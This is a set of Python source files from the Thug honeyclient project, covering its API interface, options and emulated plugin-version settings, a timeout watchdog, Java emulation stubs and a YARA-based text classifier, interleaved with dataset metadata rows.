soup.body.unwrap()
except AttributeError: # pragma: no cover
pass
code = soup.script.get_text(types=(NavigableString, CData, Script))
html = tostring(E.HTML(E.HEAD(), E.BODY(E.SCRIPT(code))))
else:
html = content
if log.ThugOpts.features_logging:
log.ThugLogging.Features.add_characters_count(len(html))
whitespaces_count = len(
[a for a in html if isinstance(a, str) and a.isspace()]
)
log.ThugLogging.Features.add_whitespaces_count(whitespaces_count)
doc = w3c.parseString(html)
window = Window("about:blank", doc, personality=log.ThugOpts.useragent)
window.open()
self.__run(window)
def run_remote(self, url):
self.__reset_classifiers_matches()
log.last_url = None
log.last_url_fetched = None
log.ThugOpts.local = False
try:
scheme = urlparse(url).scheme
except ValueError as e: # pragma: no cover
log.warning("[WARNING] Analysis not performed (%s)", str(e))
return
if not scheme or not scheme.startswith("http"):
url = f"http://{url}"
log.ThugLogging.set_url(url)
log.HTTPSession = HTTPSession()
doc = w3c.parseString("")
window = Window(log.ThugOpts.referer, doc, personality=log.ThugOpts.useragent)
window = window.open(url)
if window:
self.__run(window)
@abstractmethod
def analyze(self): # pragma: no cover
pass
| 16,364
|
Python
|
.py
| 415
| 31.436145
| 86
| 0.667426
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,045
|
Watchdog.py
|
buffer_thug/thug/ThugAPI/Watchdog.py
|
#!/usr/bin/env python
#
# Watchdog.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import os
import sys
import signal
import logging
class Watchdog:
def __init__(self, timeout, callback=None):
self.timeout = timeout
self.callback = callback
def __enter__(self):
signal.signal(signal.SIGALRM, self.handler)
signal.alarm(self.timeout)
def __exit__(self, exception_type, exception_value, traceback):
signal.alarm(0)
def handler(self, signum, frame):
thugLog = logging.getLogger("Thug")
thugLog.critical(
"The analysis took more than %d second(s). Aborting!", self.timeout
)
if self.callback:
self.callback(signum, frame)
thugLog.ThugLogging.log_event()
pid = os.getpid()
# If Thug is running in a Docker container it is assigned PID 1
# and Docker apparently ignores SIGTERM signals to PID 1
if pid in (1,): # pragma: no cover
sys.exit(1)
else:
os.kill(pid, signal.SIGTERM)
| 1,661
|
Python
|
.py
| 45
| 31.6
| 79
| 0.690535
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,046
|
IThugAPI.py
|
buffer_thug/thug/ThugAPI/IThugAPI.py
|
#!/usr/bin/env python
#
# IThugAPI.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import zope.interface
class IThugAPI(zope.interface.Interface):
def version():
"""
Print Thug version and exit
@return: None
"""
def get_useragent():
"""
get_useragent
Return the emulated user agent
@return: user agent string
"""
def set_useragent(useragent):
"""
set_useragent
Set the user agent to emulate
@param useragent: the user agent to emulate
@type useragent: C{str}
@return: None
"""
def get_events():
"""
get_events
Return the DOM events to emulate
Note: the load and mousemove are emulated by default and are not included in
the returned list
@return: List of the DOM events to emulate
"""
def set_events(events):
"""
set_events
Set the DOM events to emulate
Note: the load and mousemove events are emulated by default and do not
need to be added through set_events
@param events: comma separated list of DOM events to emulate
@type events: C{str}
@return: None
"""
def get_delay():
"""
get_delay
Return the maximum setTimeout/setInterval delay value (in milliseconds)
@return: maximum delay value (in milliseconds)
"""
def set_delay(delay):
"""
set_delay
Set a maximum setTimeout/setInterval delay value (in milliseconds)
@param delay: maximum delay value (in milliseconds)
@type delay: C{int}
@return: None
"""
def get_attachment():
"""
get_attachment
Return True if the attachment mode is set, False otherwise
@return: boolean
"""
def set_attachment(attachment):
"""
set_attachment
Set the attachment mode to the specified value
@param attachment: enable/disable attachment mode
@type delay: C{bool}
@return: None
"""
def get_image_processing():
"""
get_image_processing
Return True if the attachment mode is set, False otherwise
@return: boolean
"""
def set_image_processing():
"""
set_image_processing
Enable image processing mode
@return: None
"""
def reset_image_processing():
"""
reset_image_processing
Disable image processing mode
@return: None
"""
def enable_download_prevent():
"""
set_download_prevent
Enable download prevention mode
@return: None
"""
def disable_download_prevent():
"""
reset_image_processing
Disable download prevention mode
@return: None
"""
def get_file_logging():
"""
get_file_logging
Return True if file logging mode is enabled, False otherwise.
@return: boolean
"""
def set_file_logging():
"""
set_file_logging
Enable file logging mode
@return: None
"""
def get_json_logging():
"""
get_json_logging
Return True if JSON logging mode is enabled, False otherwise.
@return: boolean
"""
def set_json_logging():
"""
set_JSON_logging
Enable JSON logging mode
@return: None
"""
def get_features_logging():
"""
get_features_logging
Return True if features logging mode is enabled, False otherwise.
@return: boolean
"""
def set_features_logging():
"""
set_features_logging
Enable features logging mode
@return: None
"""
def reset_features_logging():
"""
reset_features_logging
Reset features logging mode
@return: None
"""
def get_elasticsearch_logging():
"""
get_elasticsearch_logging
Return True if ElasticSearch logging mode is enabled, False otherwise.
@return: boolean
"""
def set_elasticsearch_logging():
"""
set_elasticsearch_logging
Enable ElasticSearch logging mode
@return: None
"""
def get_referer():
"""
get_referer
Return the emulated referer
@return: referer value
"""
def set_referer(referer):
"""
set_referer
Set the referer to be emulated
@param referer: referer
@type referer: C{str}
@return: None
"""
def get_proxy():
"""
get_proxy
Get the proxy server to be used for establishing the connection
@return: proxy server
"""
def set_proxy(proxy):
"""
set_proxy
Set the proxy server to be used for establishing the connection
@param proxy: proxy server
@type proxy: C{str}
@return: None
"""
def get_raise_for_proxy():
"""
get_raise_for_proxy
Get the raise_for_proxy flag. If the flag is True (default) a ValueError exception
is raised if the specified proxy is not available.
@return: boolean
"""
def set_raise_for_proxy(raise_for_proxy):
"""
set_raise_for_proxy
Set the raise_for_proxy flag. If the flag is True (default) a ValueError exception
is raised if the specified proxy is not available.
@param raise_for_proxy: raise_for_proxy flag
@type: raise_for_proxy: boolean
@return: None
"""
def set_no_fetch():
"""
set_no_fetch
Prevent remote content fetching in any case
@return: None
"""
def set_verbose():
"""
set_verbose
Enable Thug verbose mode
@return: None
"""
def set_debug():
"""
set_debug
Enable Thug debug mode
@return: None
"""
def set_http_debug():
"""
set_http_debug
Enable Thug HTTP debug mode
@return: None
"""
def set_acropdf_pdf(acropdf_pdf):
"""
set_acropdf_pdf
Set the Adobe Acrobat Reader version
@param acropdf_pdf: Adobe Acrobat Reader version
@type acropdf_pdf: C{str}
@return: None
"""
def disable_acropdf():
"""
disable_acropdf
Disable Adobe Acrobat Reader
@return: None
"""
def set_shockwave_flash(shockwave):
"""
set_shockwave_flash
Set the Shockwave Flash version (supported versions: 8, 9, 10, 11, 12)
@param shockwave: Shockwave Flash version
@type shockwave: C{str}
@return: None
"""
def disable_shockwave_flash():
"""
disable_shockwave_flash
Disable Shockwave Flash
@return: None
"""
def set_javaplugin(javaplugin):
"""
set_javaplugin
Set the Java plugin version
@param javaplugin: Java plugin version
@type javaplugin: C{str}
@return: None
"""
def disable_javaplugin():
"""
disable_javaplugin
Disable Java plugin
@return: None
"""
def set_silverlight(silverlight):
"""
set_silverlight
Set the SilverLight version
@param silverlight: SilverLight version
@type silverlight: C{str}
@return: None
"""
def disable_silverlight():
"""
disable_silverlight
Disable SilverLight
@return: None
"""
def get_threshold():
"""
get_threshold
Get the maximum number of pages to fetch
@return: the maximum number of pages to fetch
"""
def set_threshold(threshold):
"""
set_threshold
Set the maximum number of pages to fetch
@param threshold: the maximum number of pages to fetch
@type threshold: C{int}
@return: None
"""
def get_extensive():
"""
get_extensive
Get the current extensive fetch of linked pages mode
@return: None
"""
def set_extensive():
"""
set_extensive
Set the extensive fetch of linked pages mode
@return: None
"""
def reset_extensive():
"""
reset_extensive
Reset the extensive fetch of linked pages mode
@return: None
"""
def get_connect_timeout():
"""
get_connect_timeout
Get the connect timeout (in seconds)
@return: the connect timeout (in seconds)
"""
def set_connect_timeout(timeout):
"""
set_connect_timeout
Set the connect timeout (in seconds)
@param timeout: the connect timeout (in seconds)
@type timeout: C{int}
@return: None
"""
def get_proxy_connect_timeout():
"""
get_proxy_connect_timeout
Get the proxy connect timeout (in seconds)
@return: the proxy connect timeout (in seconds)
"""
def set_proxy_connect_timeout(timeout):
"""
set_proxy_connect_timeout
Set the proxy connect timeout (in seconds)
@param timeout: the proxy connect timeout (in seconds)
@type timeout: C{int}
@return: None
"""
def get_timeout():
"""
get_timeout
Get the analysis timeout (in seconds)
@return: the analysis timeout (in seconds)
"""
def set_timeout(timeout):
"""
set_timeout
Set the analysis timeout (in seconds)
@param timeout: the analysis timeout (in seconds)
@type timeout: C{int}
@return: None
"""
def get_broken_url():
"""
get_broken_url
Get the broken URL mode
@return mode: broken URL mode
"""
def set_broken_url():
"""
set_broken_url
Set the broken URL mode
@return: None
"""
def disable_honeyagent():
"""
disable_honeyagent
Disable HoneyAgent Java sandbox analysis
@return: None
"""
def enable_code_logging():
"""
enable_code_logging
Enable code logging
@return: None
"""
def disable_code_logging():
"""
disable_code_logging
Disable code logging
@return: None
"""
def enable_cert_logging():
"""
enable_cert_logging
Enable SSL/TLS certificate logging
@return: None
"""
def disable_cert_logging():
"""
disable_cert_logging
Disable SSL/TLS certificate logging
@return: None
"""
def enable_screenshot():
"""
enable_screenshot
Enable screenshot mode
@return: None
"""
def disable_screenshot():
"""
disable_screenshot
Disable screenshot mode
@return: None
"""
def log_init(url):
"""
log_init
Initialize logging subsystem
@param url: URL to analyze
@type url: C{str}
@return: None
"""
def set_log_dir(logdir):
"""
set_log_dir
Set the log output directory
@param logdir: the log output directory
@type logdir: C{str}
@return: None
"""
def set_log_output(output):
"""
set_log_output
Set the log output file
@param output: the log output file
@type output: C{str}
@return: None
"""
def set_log_quiet():
"""
set_log_quiet
Disable console logging
@return: None
"""
def set_log_verbose():
"""
set_log_verbose
Enable console logging
@return: None
"""
def get_web_tracking():
"""
get_web_tracking
Return True if web client tracking inspection is enabled, False otherwise.
@return: bool
"""
def set_web_tracking():
"""
set_web_tracking
Enable web client tracking inspection
@return: None
"""
def get_async_prefetch():
"""
get_async_prefetch
Return True if asynchronous prefetching mode is enabled, False otherwise.
@return: bool
"""
def set_async_prefetch():
"""
set_async_prefetch
Enable asynchronous prefetching mode
@return: None
"""
def reset_async_prefetch():
"""
set_async_prefetch
Disable asynchronous prefetching mode
@return: None
"""
def add_urlclassifier(rule):
"""
add_urlclassifier
Add an additional URL classifier rule file
@param rule: URL classifier rule file
@type rule: C{str}
@return: None
"""
def add_htmlclassifier(rule):
"""
add_htmlclassifier
Add an additional HTML classifier rule file
@param rule: HTML classifier rule file
@type rule: C{str}
@return: None
"""
def add_jsclassifier(rule):
"""
add_jsclassifier
Add an additional JS classifier rule file
@param rule: JS classifier rule file
@type rule: C{str}
@return: None
"""
def add_vbsclassifier(rule):
"""
add_vbsclassifier
Add an additional VBS classifier rule file
@param rule: VBS classifier rule file
@type rule: C{str}
@return: None
"""
def add_textclassifier(rule):
"""
add_textclassifier
Add an additional Text classifier rule file
@param rule: Text classifier rule file
@type rule: C{str}
@return: None
"""
def add_cookieclassifier(rule):
"""
add_cookieclassifier
Add an additional Cookie classifier rule file
@param rule: Cookie classifier rule file
@type rule: C{str}
@return: None
"""
def add_sampleclassifier(rule):
"""
add_sampleclassifier
Add an additional sample classifier rule file
@param rule: Sample classifier rule file
@type rule: C{str}
@return: None
"""
def add_imageclassifier(rule):
"""
add_imageclassifier
Add an additional image classifier rule file
@param rule: Image classifier rule file
@type rule: C{str}
@return: None
"""
def add_urlfilter(filter):
"""
add_urlfilter
Add an additional URL filter file
@param filter: URL filter file
@type filter: C{str}
@return: None
"""
def add_htmlfilter(filter):
"""
add_htmlfilter
Add an additional HTML filter file
@param filter: HTML filter file
@type filter: C{str}
@return: None
"""
def add_jsfilter(filter):
"""
add_jsfilter
Add an additional JS filter file
@param filter: JS filter file
@type filter: C{str}
@return: None
"""
def add_vbsfilter(filter):
"""
add_vbsfilter
Add an additional VBS filter file
@param filter: VBS filter file
@type filter: C{str}
@return: None
"""
def add_textfilter(filter):
"""
add_textfilter
Add an additional Text filter file
@param filter: Text filter file
@type filter: C{str}
@return: None
"""
def add_cookiefilter(filter):
"""
add_cookiefilter
Add an additional Cookie filter file
@param filter: Cookie filter file
@type filter: C{str}
@return: None
"""
def add_samplefilter(filter):
"""
add_samplefilter
Add an additional sample filter file
@param filter: Sample filter file
@type filter: C{str}
@return: None
"""
def add_imagefilter(filter):
"""
add_imagefilter
Add an additional image filter file
@param filter: Image filter file
@type filter: C{str}
@return: None
"""
def add_customclassifier(cls_type, method):
"""
add_customclassifier
Add a custom classifier.
The parameter `cls_type' can assume the values
html
js
vbs
url
text
sample
image
and defines the custom classifier scope.
The parameter `method' is the method (not its name) to be additionally invoked.
The method parameters depend on the `cls_type' value and are listed here for
convenience
html method(url, html)
js method(url, script)
vbs method(url, script)
url method(url)
text method(url, text)
sample method(sample, md5)
image method(url, text)
@param cls_type: Classifier type
@param cls_type: C{str}
@param method: Classifier method
@param method: method
@return: None
"""
def reset_customclassifiers():
"""
reset_customclassifiers
Reset all the custom classifiers
@return: None
"""
def log_event():
"""
log_event
Log the URL analysis results
@return None
"""
def run_local(url):
"""
run_local
This method should be invoked by 'analyze' method for local file analysis
@param url: URL to analyze
@type url: C{str}
"""
def run_remote(url):
"""
run_remote
This method should be invoked by 'run' method for URL analysis
@param url: URL to analyze
@type url: C{str}
"""
def analyze():
"""
analyze
This method is called when the ThugAPI subclass is called and MUST be
implemented. This method can reference just the 'args' class attribute.
Returning something from this method is up to you if needed.
"""
| 19,217
|
Python
|
.py
| 676
| 19.616864
| 90
| 0.567727
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,047
|
abstractmethod.py
|
buffer_thug/thug/ThugAPI/abstractmethod.py
|
#!/usr/bin/env python
import sys
class abstractmethod:
def __init__(self, func):
self.func = func
def __call__(self, *args, **kwds):
func_name = (
self.func.__name__ if sys.version_info.major >= 3 else self.func.func_name
)
raise NotImplementedError(f"Method {func_name} is abstract")
| 341
|
Python
|
.py
| 10
| 27.5
| 86
| 0.611621
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,048
|
__init__.py
|
buffer_thug/thug/ThugAPI/__init__.py
|
from .ThugAPI import ThugAPI # noqa: F401
from .ThugOpts import ThugOpts # noqa: F401
from .ThugVulnModules import ThugVulnModules # noqa: F401
| 147
|
Python
|
.py
| 3
| 48
| 58
| 0.791667
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,049
|
ThugVulnModules.py
|
buffer_thug/thug/ThugAPI/ThugVulnModules.py
|
#!/usr/bin/env python
#
# ThugVulnModules.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
log = logging.getLogger("Thug")
class ThugVulnModules(dict):
def __init__(self):
super().__init__()
self._acropdf_pdf = "9.1.0"
self._acropdf_disabled = False
self._shockwave_flash = "10.0.64.0"
self._shockwave_flash_disabled = False
self._javaplugin = "1.6.0.32"
self._javaplugin_disabled = False
self._silverlight = "4.0.50826.0"
self._silverlight_disabled = False
def invalid_version(self, version):
for p in version.split("."):
if not p.isdigit():
return True
return False
def get_acropdf_pdf(self):
return self._acropdf_pdf
@property
def acropdf(self):
return self._acropdf_pdf
def set_acropdf_pdf(self, version):
if self.invalid_version(version):
log.warning(
"[WARNING] Invalid Adobe Acrobat Reader version provided (using default one)"
)
return
self._acropdf_pdf = version
acropdf_pdf = property(get_acropdf_pdf, set_acropdf_pdf)
def disable_acropdf(self):
self._acropdf_disabled = True
@property
def acropdf_disabled(self):
return self._acropdf_disabled
def get_shockwave_flash(self):
return self._shockwave_flash
def set_shockwave_flash(self, version):
if version.split(".")[0] not in (
"8",
"9",
"10",
"11",
"12",
) or self.invalid_version(version):
log.warning(
"[WARNING] Invalid Shockwave Flash version provided (using default one)"
)
return
self._shockwave_flash = version
shockwave_flash = property(get_shockwave_flash, set_shockwave_flash)
def disable_shockwave_flash(self):
self._shockwave_flash_disabled = True
@property
def shockwave_flash_disabled(self):
return self._shockwave_flash_disabled
def get_javaplugin(self):
javaplugin = self._javaplugin.split(".")
last = javaplugin.pop()
return f"{''.join(javaplugin)}_{last}"
def set_javaplugin(self, version):
if self.invalid_version(version):
log.warning(
"[WARNING] Invalid JavaPlugin version provided (using default one)"
)
return
_version = version.split(".")
while len(_version) < 4:
_version.append("0")
if len(_version[3]) == 1:
_version[3] = f"0{_version[3]}"
self._javaplugin = ".".join(_version)
javaplugin = property(get_javaplugin, set_javaplugin)
def disable_javaplugin(self):
self._javaplugin_disabled = True
@property
def javaplugin_disabled(self):
return self._javaplugin_disabled
@property
def javawebstart_isinstalled(self):
javawebstart = self._javaplugin.split(".")
javawebstart.pop()
return f"{'.'.join(javawebstart)}.0"
def get_silverlight(self):
return self._silverlight
def set_silverlight(self, version):
if version.split(".")[0] not in (
"1",
"2",
"3",
"4",
"5",
) or self.invalid_version(version):
log.warning(
"[WARNING] Invalid Silverlight version provided (using default one)"
)
return
self._silverlight = version
silverlight = property(get_silverlight, set_silverlight)
def disable_silverlight(self):
self._silverlight_disabled = True
@property
def silverlight_disabled(self):
return self._silverlight_disabled
| 4,382
|
Python
|
.py
| 122
| 27.778689
| 93
| 0.622722
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,050
|
ThugOpts.py
|
buffer_thug/thug/ThugAPI/ThugOpts.py
|
#!/usr/bin/env python
#
# ThugOpts.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import sys
import logging
from urllib.parse import urlparse
from thug.DOM.Personality import Personality
log = logging.getLogger("Thug")
class ThugOpts(dict):
proxy_schemes = (
"http",
"socks4",
"socks5",
"socks5h",
)
def __init__(self):
super().__init__()
self._verbose = False
self._debug = False
self._proxy = None
self._raise_for_proxy = True
self.local = False
self.extensive = False
self._threshold = 0
self._connect_timeout = 10
self._proxy_connect_timeout = 5
self._timeout = 600
self.ast_debug = False
self.http_debug = 0
self._useragent = "winxpie60"
self._referer = "about:blank"
self._events = []
self._delay = 0
self._attachment = False
self._file_logging = False
self._json_logging = False
self._es_logging = False
self._code_logging = True
self._cert_logging = True
self._features_logging = False
self._screenshot = False
self._awis = False
self._no_fetch = False
self._broken_url = False
self._ssl_verify = False
self._mongodb_address = None
self._web_tracking = False
self._async_prefetch = False
self._honeyagent = True
self.activex_ready = True
self._image_processing = False
self._download_prevent = True
self.Personality = Personality()
def set_verbose(self, verbose):
self._verbose = verbose
def get_verbose(self):
return self._verbose
verbose = property(get_verbose, set_verbose)
def set_debug(self, debug):
self._debug = debug
def get_debug(self):
return self._debug
debug = property(get_debug, set_debug)
def set_proxy(self, proxy):
if not proxy:
self._proxy = None
return
p = urlparse(proxy)
if p.scheme.lower() not in self.proxy_schemes:
log.warning(
"[ERROR] Invalid proxy scheme (valid schemes: http, socks4, socks5, socks5h)"
)
sys.exit(0)
self._proxy = proxy
def get_proxy(self):
return self._proxy
proxy = property(get_proxy, set_proxy)
def set_raise_for_proxy(self, raise_for_proxy):
self._raise_for_proxy = raise_for_proxy
def get_raise_for_proxy(self):
return self._raise_for_proxy
raise_for_proxy = property(get_raise_for_proxy, set_raise_for_proxy)
def get_useragent(self):
return self._useragent
def set_useragent(self, useragent):
if useragent not in self.Personality:
log.warning(
'[WARNING] Invalid User Agent provided (using default "%s")',
self._useragent,
)
return
self._useragent = useragent
useragent = property(get_useragent, set_useragent)
def get_referer(self):
return self._referer
def set_referer(self, referer):
self._referer = referer
referer = property(get_referer, set_referer)
def get_events(self):
return self._events
def set_events(self, events):
if not events:
self._events = []
return
for e in events.split(","):
evt = e.lower().strip()
if evt not in self._events:
self._events.append(evt)
events = property(get_events, set_events)
def get_delay(self):
return self._delay
def set_delay(self, timeout):
try:
_timeout = int(timeout)
except ValueError:
log.warning("[WARNING] Ignoring invalid delay value (should be an integer)")
return
self._delay = abs(_timeout)
delay = property(get_delay, set_delay)
def get_attachment(self):
return self._attachment
def set_attachment(self, attachment):
self._attachment = attachment
attachment = property(get_attachment, set_attachment)
def get_image_processing(self):
return self._image_processing
def set_image_processing(self, image_processing):
self._image_processing = image_processing
image_processing = property(get_image_processing, set_image_processing)
def get_file_logging(self):
return self._file_logging
def set_file_logging(self, file_logging):
self._file_logging = file_logging
file_logging = property(get_file_logging, set_file_logging)
def get_json_logging(self):
return self._json_logging
def set_json_logging(self, json_logging):
self._json_logging = json_logging
json_logging = property(get_json_logging, set_json_logging)
def get_es_logging(self):
return self._es_logging
def set_es_logging(self, es_logging):
self._es_logging = es_logging
elasticsearch_logging = property(get_es_logging, set_es_logging)
def get_code_logging(self):
return self._code_logging
def set_code_logging(self, code_logging):
self._code_logging = code_logging
code_logging = property(get_code_logging, set_code_logging)
def get_cert_logging(self):
return self._cert_logging
def set_cert_logging(self, cert_logging):
self._cert_logging = cert_logging
cert_logging = property(get_cert_logging, set_cert_logging)
def get_features_logging(self):
return self._features_logging
def set_features_logging(self, features_logging):
self._features_logging = features_logging
features_logging = property(get_features_logging, set_features_logging)
def get_no_fetch(self):
return self._no_fetch
def set_no_fetch(self, fetch):
self._no_fetch = fetch
no_fetch = property(get_no_fetch, set_no_fetch)
def get_download_prevent(self):
return self._download_prevent
def set_download_prevent(self, download_prevent):
self._download_prevent = download_prevent
download_prevent = property(get_download_prevent, set_download_prevent)
def get_threshold(self):
return self._threshold
def set_threshold(self, threshold):
try:
value = int(threshold)
except ValueError:
log.warning(
"[WARNING] Ignoring invalid threshold value (should be an integer)"
)
return
self._threshold = value
threshold = property(get_threshold, set_threshold)
def get_connect_timeout(self):
return self._connect_timeout
def set_connect_timeout(self, timeout):
try:
seconds = int(timeout)
except ValueError:
log.warning(
"[WARNING] Ignoring invalid connect timeout value (should be an integer)"
)
return
self._connect_timeout = seconds
connect_timeout = property(get_connect_timeout, set_connect_timeout)
def get_proxy_connect_timeout(self):
return self._proxy_connect_timeout
def set_proxy_connect_timeout(self, timeout):
try:
seconds = int(timeout)
except ValueError:
log.warning(
"[WARNING] Ignoring invalid proxy connect timeout value (should be an integer)"
)
return
self._proxy_connect_timeout = seconds
proxy_connect_timeout = property(
get_proxy_connect_timeout, set_proxy_connect_timeout
)
def get_timeout(self):
return self._timeout
def set_timeout(self, timeout):
try:
seconds = int(timeout)
except ValueError:
log.warning(
"[WARNING] Ignoring invalid timeout value (should be an integer)"
)
return
self._timeout = seconds
timeout = property(get_timeout, set_timeout)
def get_screenshot(self):
return self._screenshot
def set_screenshot(self, screenshot):
self._screenshot = screenshot
screenshot = property(get_screenshot, set_screenshot)
def get_awis(self):
return self._awis
def set_awis(self, awis):
self._awis = awis
awis = property(get_awis, set_awis)
def get_broken_url(self):
return self._broken_url
def set_broken_url(self, mode):
self._broken_url = mode
broken_url = property(get_broken_url, set_broken_url)
def get_ssl_verify(self):
return self._ssl_verify
def set_ssl_verify(self, verify):
self._ssl_verify = verify
ssl_verify = property(get_ssl_verify, set_ssl_verify)
def get_web_tracking(self):
return self._web_tracking
def set_web_tracking(self, enabled):
self._web_tracking = enabled
web_tracking = property(get_web_tracking, set_web_tracking)
def get_async_prefetch(self):
return self._async_prefetch
def set_async_prefetch(self, enabled):
self._async_prefetch = enabled
async_prefetch = property(get_async_prefetch, set_async_prefetch)
def get_honeyagent(self):
return self._honeyagent
def set_honeyagent(self, enabled):
self._honeyagent = enabled
honeyagent = property(get_honeyagent, set_honeyagent)
def get_mongodb_address(self):
return self._mongodb_address
def set_mongodb_address(self, mongodb_address):
self._mongodb_address = mongodb_address
mongodb_address = property(get_mongodb_address, set_mongodb_address)
| 10,186
|
Python
|
.py
| 273
| 29.274725
| 95
| 0.643921
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,051
|
java.py
|
buffer_thug/thug/Java/java.py
|
#!/usr/bin/env python
#
# java.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
from .lang import lang
class java:
def __init__(self):
self.lang = lang()
| 763
|
Python
|
.py
| 21
| 34.619048
| 70
| 0.760487
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,052
|
lang.py
|
buffer_thug/thug/Java/lang.py
|
#!/usr/bin/env python
#
# lang.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
from .System import System
class lang:
def __init__(self):
self.System = System()
| 771
|
Python
|
.py
| 21
| 35
| 70
| 0.763052
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,053
|
System.py
|
buffer_thug/thug/Java/System.py
|
#!/usr/bin/env python
#
# System.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
log = logging.getLogger("Thug")
class System:
@staticmethod
def getProperty(_property):
if _property == "java.version":
javaplugin = log.ThugVulnModules._javaplugin.split(".")
last = javaplugin.pop()
return f"{'.'.join(javaplugin)}_{last}"
if _property == "java.vendor":
return "Sun Microsystems Inc."
return "" # pragma: no cover
| 1,109
|
Python
|
.py
| 29
| 34.275862
| 70
| 0.711359
|
buffer/thug
| 978
| 204
| 0
|
GPL-2.0
|
9/5/2024, 5:11:50 PM (Europe/Amsterdam)
|
13,054
|
TextClassifier.py
|
buffer_thug/thug/Classifier/TextClassifier.py
|
#!/usr/bin/env python
#
# TextClassifier.py
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
import logging
from .BaseClassifier import BaseClassifier
log = logging.getLogger("Thug")
class TextClassifier(BaseClassifier):
default_rule_file = "rules/textclassifier.yar"
default_filter_file = "rules/textfilter.yar"
_classifier = "Text Classifier"
def __init__(self):
BaseClassifier.__init__(self)
def classify(self, url, text):
for match in self.rules.match(data=text):
if (url, match) in self.matches:
continue
self.matches.append((url, match))
if self.discard_url_match(url, match): # pragma: no cover
continue
self.handle_match_etags(match)
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("text", url, rule, tags, meta)
for c in self.custom_classifiers: # pylint: disable=consider-using-dict-items
self.custom_classifiers[c](url, text)
def filter(self, url, html):
ret = False
for match in self.filters.match(data=html):
rule = match.rule
meta = match.meta
tags = ",".join([" ".join(t.split("_")) for t in match.tags])
log.ThugLogging.log_classifier("textfilter", url, rule, tags, meta)
